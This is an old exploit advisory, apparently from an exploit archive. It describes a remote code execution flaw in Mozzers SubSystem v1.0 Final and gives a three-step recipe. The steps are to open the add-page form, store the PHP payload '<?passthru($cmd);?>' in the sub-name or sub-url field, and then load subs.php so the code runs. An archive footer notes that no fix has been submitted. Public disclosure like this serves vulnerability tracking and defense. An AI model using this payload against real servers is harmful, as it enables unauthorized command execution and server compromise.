Mozzers SubSystem final (subs.php) Remote Code Execution Vulnerability

2007-04-18 00:00:00

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+ +
+ Y! Underground Group +
+ +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+ +
+ Portal......: Mozzers SubSystem v1.0 Final +
+ Author......: Dj7xpl / [email protected] +
+ Type........: Remote Code Execution Vulnerability +
+ Download....: http://sourceforge.net/projects/subsystem/ +
+ Page........: http://Dj7xpl.2600.ir +
+ +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+ +
+ Bug.........: +
+ (1) Open Target By Browser : http://[Target]/[Path]/index.php?page=add +
+ (2) Insert Bad Code Into (Sub-name) Or (Sub-url) E.g :<?passthru($cmd);?> +
+ (3) See Your Bad Code : http://[Target]/[Path]/subs.php +
+ +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

#

Fixes

No fixes

In order to submit a new fix you need to be registered.